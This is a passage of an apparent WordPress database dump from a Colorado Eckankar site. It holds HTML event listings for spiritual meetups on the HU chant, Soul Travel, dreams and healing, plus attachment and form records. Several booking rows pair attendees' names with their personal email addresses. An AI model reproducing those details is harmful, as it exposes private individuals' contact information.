class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><span style=\"font-size: 18pt; color: #cf7119;\">A Secret to Spiritual Living</span></p>\r\n<ul class=\"pl-5 list-disc mb-4\">\r\n	<li><span style=\"font-size: 14pt;\"><strong>Would you like to handle the ups and downs of life with more grace?</strong></span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>Are you looking for a greater connection to the divine?</strong></span></li>\r\n	<li><span style=\"font-size: 14pt;\"><strong>Are you ready to recognize the hand of God in your life and gratefully accept what comes your way?</strong></span></li>\r\n</ul>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">If you answered yes to any of these questions, then this spiritual event is for you. You will hear inspiring spiritual stories, experience the HU chant, a love song to God, and be able to speak with other like-hearted spiritual seekers in a low-key, no pressure setting. Please come and explore your own answers with open hearts, eyes and ears.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">\"The daily struggles that life presents are opportunities to cultivate spiritual grace.\" --Harold Klemp,&nbsp;<em>The Awakening Soul,</em>&nbsp;p 31</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Welcome to All.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><em><strong>The ECK Light &amp; Sound Service will be held in person at the ECK Temple of Colorado, 7100 West Mississippi Avenue in Lakewood Colorado and will be broadcast live simultaneously on Zoom.</strong></em>&nbsp;<strong>Please Register to get the Zoom link</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by&nbsp;<a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">Eckankar </a>as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','The Power of Grace','','publish','closed','closed','','eck-light-and-sound-service-in-person-onlinetitle-goes-here-template-998','','','2023-10-03 21:30:17','2023-10-04 03:30:17','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269109',0,'mec-events','',0),(269111,15,'2023-09-21 22:33:19','2023-09-22 04:33:19','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Accelerate Your Pursuit of Truth<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Keys to&nbsp;<strong>accelerate your pursuit of truth</strong>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Spiritual experiences are experiences which go beyond normal earthly experiences. We live in a time of unprecedented interest in spirituality. Spiritual experiences are part of everyday living for millions of people.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“Go to the holy of the holies. It is the temple inside you. This is the place where all truth comes from. …”</span><br>\r\n<span style=\"font-size: 14pt;\">― Harold Klemp, <em>Spiritual Experiences Guidebook</em>, p. 5</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Contemplation is a method that enables you to begin to&nbsp;<strong>actively explore the inner worlds</strong>&nbsp;of your own being.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will be&nbsp;<strong>utilizing the tools</strong> and exercises in the <em>Spiritual Experiences Guidebook</em>&nbsp;in this interactive class.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>References:</strong></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Online:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">To learn more about ‘Spiritual Experiences‘, visit:&nbsp;<a class=\"!text-viridian\" href=\"https://spiritualexperience.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://spiritualexperience.org/</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><strong>Book</strong>:</span><br>\r\n<span style=\"font-size: 14pt;\">‘<em>Spiritual Experiences Guidebook</em>‘</span><br>\r\n<span style=\"font-size: 14pt;\">by Harold Klemp</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This interactive book and CD answer questions and validate spiritual experiences for people of all faiths.</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/items/-1512-0.html\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://www.eckbooks.org/items/-1512-0.html</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Table of Contents - ‘<em>Spiritual Experiences Guidebook</em>‘:&nbsp;<a class=\"!text-viridian\" href=\"https://www.eckbooks.org/content/pdf/Spir_Exp_Guide_TOC.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://www.eckbooks.org/content/pdf/Spir_Exp_Guide_TOC.pdf</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">For a&nbsp;<strong>free book</strong>&nbsp;and CD, go to:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://spiritualexperience.org/guidebook-download-form/\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://spiritualexperience.org/guidebook-download-form/</a></span><br>\r\n<span style=\"font-size: 14pt;\">or you can call</span><br>\r\n<span style=\"font-size: 14pt;\">1-888-LOVE-GOD (1-888-568-3463)</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">——</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The&nbsp;<strong>inner</strong>&nbsp;<strong>worlds</strong>:</span><br>\r\n<span style=\"font-size: 14pt;\">The Worlds can best be described as planes of reality. Each plane corresponds to a certain state of consciousness and vibration.</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckankar.org/the-god-worlds-of-eck/\" target=\"_blank\" rel=\"nofollow noopener ugc\">https://www.eckankar.org/the-god-worlds-of-eck/</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Web page for this SEGAMeetup:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.meetup.com/segofaurora/events/296051211/\" target=\"_blank\" rel=\"noopener\">https://www.meetup.com/segofaurora/events/296051211/</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next SEGAM Zoom video | conference call Meetup will be on Wednesday, November 1st at 7:00 p.m. We will discuss ‘<a class=\"!text-viridian\" href=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Finding Your Lifes Purpose</a>’.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://meetup.com/SEGofAurora/events\" target=\"_blank\" rel=\"noopener\">http://meetup.com/SEGofAurora/events</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by</span><br>\r\n<span style=\"font-size: 14pt;\">ECKANKAR</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">http://www.eckankar-colorado.org</a></span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/296051211/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Spiritual Experiences','','publish','closed','closed','','title-goes-herein-person-discussion-meetup-template-259','','','2023-09-21 22:33:19','2023-09-22 04:33:19','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269111',0,'mec-events','',0),(269112,15,'2023-09-21 22:31:48','2023-09-22 04:31:48','','PathToGod','','inherit','closed','closed','','pathtogod','','','2023-09-21 22:31:48','2023-09-22 04:31:48','',269111,'https://eckankar-colorado.org/wp-content/uploads/2023/09/PathToGod.webp',0,'attachment','image/webp',0),(269113,0,'2023-09-22 12:35:37','2023-09-22 18:35:37','','','','publish','closed','closed','','269113','','','2023-09-22 12:35:37','2023-09-22 18:35:37','',0,'https://eckankar-colorado.org/nf_sub/269113/',0,'nf_sub','',0),(269114,0,'2023-09-22 14:32:22','2023-09-22 20:32:22','','','','publish','closed','closed','','269114','','','2023-09-22 14:32:22','2023-09-22 20:32:22','',0,'https://eckankar-colorado.org/nf_sub/269114/',0,'nf_sub','',0),(269158,0,'2023-10-03 16:36:07','2023-10-03 22:36:07','','','','publish','closed','closed','','269158','','','2023-10-03 16:36:07','2023-10-03 22:36:07','',0,'https://eckankar-colorado.org/nf_sub/269158/',0,'nf_sub','',0),(269118,15,'2023-09-26 07:44:26','2023-09-26 13:44:26','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Spiritual Principles To Turn Dreams Into Reality<br>\r\n</span></strong></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Where do you want to go?&nbsp; &nbsp; &nbsp;</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">What do you want to do?&nbsp; &nbsp; &nbsp;</span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Who do you want to be? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">What is your biggest dream? </span></strong></p>\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 14pt;\">Have you decided to go for it?</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Let’s face it, it takes work to create the life you want! But nothing is impossible if you work with Spirit. This workshop focuses on the inner work you can do to make your dream a reality. We will use simple spiritual techniques and exercises to help you come into alignment with your dream and create a roadmap to a happier more successful you.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Manifest Your Heart’s Desire','','publish','closed','closed','','title-goes-herein-person-discussion-meetup-template-982','','','2023-09-26 07:44:26','2023-09-26 13:44:26','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269118',0,'mec-events','',0),(269119,15,'2023-09-26 07:36:45','2023-09-26 13:36:45','','GoldenHeart2','','inherit','closed','closed','','goldenheart2','','','2023-09-26 07:36:45','2023-09-26 13:36:45','',269118,'https://eckankar-colorado.org/wp-content/uploads/2023/09/GoldenHeart2.webp',0,'attachment','image/webp',0),(269364,0,'2023-11-04 17:35:09','2023-11-04 23:35:09','','','','publish','closed','closed','','269364','','','2023-11-04 17:35:09','2023-11-04 23:35:09','',0,'https://eckankar-colorado.org/nf_sub/269364/',0,'nf_sub','',0),(269301,2,'2023-10-28 09:07:36','2023-10-28 15:07:36','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Past Lives, Dreams and Soul Travel<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Have you ever thought about where you go when you close your eyes - when you daydream, or at night when you dream? Sometimes our dreams and imagination seem more real than everyday life. That\'s Soul Travel. It\'s a natural process that opens the door to the incredible universes where we truly live and have our being. </span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">As Soul, a divine spark of God, we are spiritual beings with the ability to shift our state of consciousness at will and experience greater love, freedom and awareness in our daily lives. This interactive class will focus primarily on Soul Travel, (but will likely touch on Past Lives and Dreams too.) We will cover tools, or techniques, you can use on your spiritual journey, regardless of your spiritual orientation. You do not need to have attended prior classes or have read the book to participate. We will have complimentary copies available. This is the&nbsp;<strong>second</strong>&nbsp;of two classes on Soul Travel. Hope to see you there!</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">This event is sponsored by Eckankar and is free of charge. Find out more about HU at <a href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"noopener\">What is HU? | HU is the Sound of Soul | ECKANKAR.</a></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-of-loveland/events/296983282/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Past Lives, Dreams, and Soul Travel','','publish','closed','closed','','past-lives-dreams-and-soul-travel','','','2023-10-28 21:26:05','2023-10-29 03:26:05','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=269301',0,'mec-events','',0),(269303,15,'2023-10-28 09:05:08','2023-10-28 15:05:08','','ColumnsWater','','inherit','closed','closed','','columnswater','','','2023-10-28 09:05:08','2023-10-28 15:05:08','',269301,'https://eckankar-colorado.org/wp-content/uploads/2023/10/ColumnsWater.webp',0,'attachment','image/webp',0),(269304,0,'2023-10-28 18:47:28','2023-10-29 00:47:28','','','','publish','closed','closed','','269304','','','2023-10-28 18:47:28','2023-10-29 00:47:28','',0,'https://eckankar-colorado.org/nf_sub/269304/',0,'nf_sub','',0),(269305,0,'2023-10-28 18:50:51','2023-10-29 00:50:51','','','','publish','closed','closed','','269305','','','2023-10-28 18:50:51','2023-10-29 00:50:51','',0,'https://eckankar-colorado.org/nf_sub/269305/',0,'nf_sub','',0),(269306,0,'2023-10-28 20:30:27','2023-10-29 02:30:27','','','','publish','closed','closed','','269306','','','2023-10-28 20:30:27','2023-10-29 02:30:27','',0,'https://eckankar-colorado.org/nf_sub/269306/',0,'nf_sub','',0),(269308,0,'2023-10-29 08:06:20','2023-10-29 14:06:20','','','','publish','closed','closed','','269308','','','2023-10-29 08:06:20','2023-10-29 14:06:20','',0,'https://eckankar-colorado.org/nf_sub/269308/',0,'nf_sub','',0),(269354,2,'2023-11-04 11:42:33','2023-11-04 17:42:33','<iframe title=\"Discover Eckankar and Advanced Spiritual Living\" width=\"500\" height=\"281\" src=\"https://www.youtube.com/embed/s78XVcM7HWI?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen></iframe>','','','publish','closed','closed','','bff9b01f87e9e8963e733f0ecf5b2049','','','2023-11-04 11:42:33','2023-11-04 17:42:33','',0,'https://eckankar-colorado.org/bff9b01f87e9e8963e733f0ecf5b2049/',0,'oembed_cache','',0),(267183,0,'2022-09-08 17:47:30','2022-09-08 23:47:30','','','','publish','closed','closed','','267183','','','2022-09-08 17:47:30','2022-09-08 23:47:30','',0,'https://eckankar-colorado.org/nf_sub/267183/',0,'nf_sub','',0),(267185,15,'2022-09-08 20:13:45','2022-09-09 02:13:45','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">How do miracles occur?</span><br>\r\n<span style=\"font-size: 14pt;\">Where does healing come from?</span><br>\r\n<span style=\"font-size: 14pt;\">How can you heal the past to help yourself now?</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will discuss the many health benefits of spiritual living and practice techniques you can use for healing. Our goal is that you will see yourself and your state of health from a higher perspective than you’ve likely ever imagined possible.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Harold Klemp says&nbsp;<em>“</em>All the help that comes to us is from the Holy Spirit, whether it comes in a dream or through the help of a friend or a doctor. The trick is the discrimination you need: to tell what’s good for you and what’s not good for you.<em>”</em></span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">This event, sponsored by Eckankar as a community service, is a spiritual resource for people of all faiths and beliefs. Eckankar is the Path of Spiritual Freedom. It is an individual, creative practice to experience and explore our own unique relationship with the Divine.</span></p>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofdenver/events/288329619/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'12 Gifts of Spiritual Living: Health and Healing\'','','publish','closed','closed','','meetup-online12-gifts-of-spiritual-living-health-and-healing','','','2022-09-08 20:13:45','2022-09-09 02:13:45','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267185',0,'mec-events','',0),(267186,15,'2022-09-08 20:24:11','2022-09-09 02:24:11','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Experience The Sound of Soul--HU, Sacred Sound, Ancient Mantra</span><br>\r\n<span style=\"font-size: 14pt;\">-Discover Your Inner Guidance</span><br>\r\n<span style=\"font-size: 14pt;\">-Healing for Body, Mind and Spirit</span><br>\r\n<span style=\"font-size: 14pt;\">-A Higher Form of Creativity</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Experience HU--The Sound of Soul Events offer the opportunity to chant HU, a love song to God; engage in spiritual conversation; and enjoy community. Meet others of like heart who share a desire to explore their own connection with God or Divine Spirit.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Overview of an Experience the Sound of Soul event:</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• There will be a warm introduction.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• The facilitator will read an inspiring quote.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• We will chant HU with love for about 15 - 20 minutes (pronounced like the word hue.)</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• There will be a quiet contemplation time of about 3 to 5 minutes.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">• Finally, you\'ll have the opportunity for spiritual conversation in a welcoming and respectful atmosphere to explore your own connection with God or Divine Spirit.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We hope that you will join us for this uplifting event that is sponsored by ECKANKAR, the Path of Spiritual Freedom. It is open to anyone of any religion, culture or walk of life. For more info on the HU, go to:&nbsp;<a class=\"link\" href=\"https://www.eckankar.org/experience/hu-the-sound-of-soul/\" target=\"_blank\" rel=\"nofollow noopener ugc\">HU Sacred Sound Ancient Mantra</a>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Bring a chair or blanket to sit on.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\"><br>\r\n</span><a class=\"meetupreg\" href=\"https://www.meetup.com/segofbv/events/288195567/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\r\n**</strong>&nbsp;<em>We are following the current Boulder County guidelines for all in person events. Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\r\n<p class=\"\">&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Experience HU, The Sound of Soul Event - In Person','','publish','closed','closed','','experience-hu-the-sound-of-soul-event-in-person','','','2022-09-08 20:24:11','2022-09-09 02:24:11','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267186',0,'mec-events','',0),(267187,0,'2022-09-09 22:52:34','2022-09-10 04:52:34','','','','publish','closed','closed','','267187','','','2022-09-09 22:52:34','2022-09-10 04:52:34','',0,'https://eckankar-colorado.org/nf_sub/267187/',0,'nf_sub','',0),(267189,1000026,'2022-09-11 10:30:00','2022-09-11 16:30:00','','Tom Walker  - tomw2891@gmail.com','','publish','closed','closed','','tom-walker-tomw2891gmail-com-2','','','2022-09-11 10:30:00','2022-09-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267189',0,'mec-books','',0),(267190,0,'2022-09-10 20:44:10','2022-09-11 02:44:10','','','','publish','closed','closed','','267190','','','2022-09-10 20:44:10','2022-09-11 02:44:10','',0,'https://eckankar-colorado.org/nf_sub/267190/',0,'nf_sub','',0),(267191,1000023,'2022-09-11 10:30:00','2022-09-11 16:30:00','','Bonnie G - bngstreet@gmail.com','','publish','closed','closed','','bonnie-g-bngstreetgmail-com','','','2022-09-11 10:30:00','2022-09-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267191',0,'mec-books','',0),(267192,1000026,'2022-09-11 10:30:00','2022-09-11 16:30:00','','Tom walker - tomw2891@gmail.com','','publish','closed','closed','','tom-walker-tomw2891gmail-com-3','','','2022-09-11 10:30:00','2022-09-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267192',0,'mec-books','',0),(267193,1000022,'2022-09-11 10:30:00','2022-09-11 16:30:00','','Jorge Santiago - jiuuumaluk@gmail.com','','publish','closed','closed','','jorge-santiago-jiuuumalukgmail-com-5','','','2022-09-11 10:30:00','2022-09-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267193',0,'mec-books','',0),(267194,1000046,'2022-09-11 10:30:00','2022-09-11 16:30:00','','Penny - pennycole57@gmail.com','','publish','closed','closed','','penny-pennycole57gmail-com','','','2022-09-11 10:30:00','2022-09-11 16:30:00','',0,'https://eckankar-colorado.org/?post_type=mec-books&p=267194',0,'mec-books','',0),(267195,1000047,'2022-09-11 10:30:00','2022-09-11 16:30:00','','Frances - beth1848@yahoo.com','','publish','closed','closed','','frances-beth1848yahoo-com','','','2022-09-11 10:30:00','2022-09-11 16:30:00','',0,'https://eckankar-colorado.org/mec-books/frances-beth1848yahoo-com/',0,'mec-books','',0),(267196,0,'2022-09-11 11:26:38','2022-09-11 17:26:38','','','','publish','closed','closed','','267196','','','2022-09-11 11:26:38','2022-09-11 17:26:38','',0,'https://eckankar-colorado.org/nf_sub/267196/',0,'nf_sub','',0),(267201,2,'2022-09-12 21:21:22','2022-09-13 03:21:22','','unsplash-wave-surfer-1','','inherit','closed','closed','','unsplash-wave-surfer-1','','','2022-09-12 21:21:22','2022-09-13 03:21:22','',0,'https://eckankar-colorado.org/wp-content/uploads/2022/09/unsplash-wave-surfer-1.jpg',0,'attachment','image/jpeg',0),(267207,2,'2022-09-13 10:23:57','2022-09-13 16:23:57','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"mb-4\"><strong><span style=\"font-size: 16pt;\">Sometimes the world seems to tumble all around me.<br>\r\n</span></strong><strong><span style=\"font-size: 16pt;\">I wonder how to bring light to each situation.</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">As Soul, an eternal spark of God, I know I have the light of truth in my heart, and as a student of ECKANKAR, I have spiritual tools that help me bring that light to my friends, my family, and my community. I’m reminded to be present in each moment.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The spiritual leader of ECKANKAR, Harold Klemp, says:<br>\r\n<br>\r\n</span></p>\r\n<blockquote class=\"bg-blockquote border\" style=\"border-color: #954a00; margin-top: -15px; margin-left: 20px;\">\r\n<p><span style=\"color: #666666; font-size: 14pt;\">“Whenever you see someone acting with love, goodwill, charity, compassion, and qualities of this nature—a person who actually lives those qualities—you’re seeing a genuine person. Then you can say, ‘This is someone living in the Light and Sound of God’.\"</span></p>\r\n<p><span style=\"font-size: 12pt; color: #666666;\">— Harold Klemp, <em> The Awakened Heart, </em>pp 98</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">I warmly invite you to this open conversation about how to bring your heart’s light to each situation. Share or simply listen as you feel comfortable.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will use a brief spiritual exercise to help us.</span><br>\r\n<span style=\"font-size: 14pt;\">All are welcome.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">We will meet via ZOOM again. Please RSVP to get the link.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The event is free and offered by ECKANKAR, the Path of Spiritual Freedom, as a community service.</span></p>\r\n<br>\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-lone-tree/events/288447925/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Meetup - Online<br>\'Shine Your Heart’s Light in Any Situation\'<br> (An ECKANKAR Perspective)','','publish','closed','closed','','meetup-onlineshine-your-hearts-light-in-any-situation-an-eckankar-perspective-via-zoom','','','2022-09-13 10:32:52','2022-09-13 16:32:52','',0,'https://eckankar-colorado.org/?post_type=mec-events&#038;p=267207',0,'mec-events','',0),(267208,2,'2022-09-13 10:21:26','2022-09-13 16:21:26','','golden-heart-2','','inherit','closed','closed','','golden-heart-2','','','2022-09-13 10:21:26','2022-09-13 16:21:26','',267207,'https://eckankar-colorado.org/wp-content/uploads/2022/09/golden-heart-2.jpg',0,'attachment','image/jpeg',0),(267211,2,'2022-09-13 10:58:23','2022-09-13 16:58:23','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt;\">Did you know that dreaming can be an art?</span></strong></p>\r\n<p class=\"\"><br>\r\n<span style=\"font-size: 14pt;\">Your life is a canvas, and you are the artist. Your dreams are the secret to creating a masterpiece. Learning to see and use the wisdom you receive from your dreams is an art.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Throughout the ages, dreams were held in high esteem. Different prophets and dream interpreters held the fate of nations in their hands.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You can place spiritual dreaming in its rightful place at the center of the whole study of dreams. </span><span style=\"font-size: 14pt;\">Your dreams are real.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Learn how the eight types of dreams can help you gain insights from the past and future, grow in confidence, heal yourself spiritually, and make decisions about your career and finances. You can learn to do this from a unique point of view: Recognize the spiritual nature of your dreams. Create your masterpiece!</span></p>\r\n<p class=\"\" style=\"padding-left: 40px;\"><span style=\"font-size: 14pt;\"><span id=\"page3R_mcid7\" class=\"markedContent\"><span dir=\"ltr\" role=\"presentation\">•</span> <span dir=\"ltr\" role=\"presentation\">Recognize</span> <span dir=\"ltr\" role=\"presentation\">the</span> <span dir=\"ltr\" role=\"presentation\">spiritual</span> <span dir=\"ltr\" role=\"presentation\">nature</span> <span dir=\"ltr\" role=\"presentation\">of</span> <span dir=\"ltr\" role=\"presentation\">your</span> <span dir=\"ltr\" role=\"presentation\">dreams</span></span><span id=\"page3R_mcid8\" class=\"markedContent\"><br>\r\n<span dir=\"ltr\" role=\"presentation\">•</span> <span dir=\"ltr\" role=\"presentation\">Learn</span> <span dir=\"ltr\" role=\"presentation\">how</span> <span dir=\"ltr\" role=\"presentation\">to</span> <span dir=\"ltr\" role=\"presentation\">identify</span> <span dir=\"ltr\" role=\"presentation\">8</span> <span dir=\"ltr\" role=\"presentation\">types</span> <span dir=\"ltr\" role=\"presentation\">of</span> <span dir=\"ltr\" role=\"presentation\">dreams</span></span><span id=\"page3R_mcid9\" class=\"markedContent\"><br>\r\n<span dir=\"ltr\" role=\"presentation\">•</span> <span dir=\"ltr\" role=\"presentation\">Discover</span> <span dir=\"ltr\" 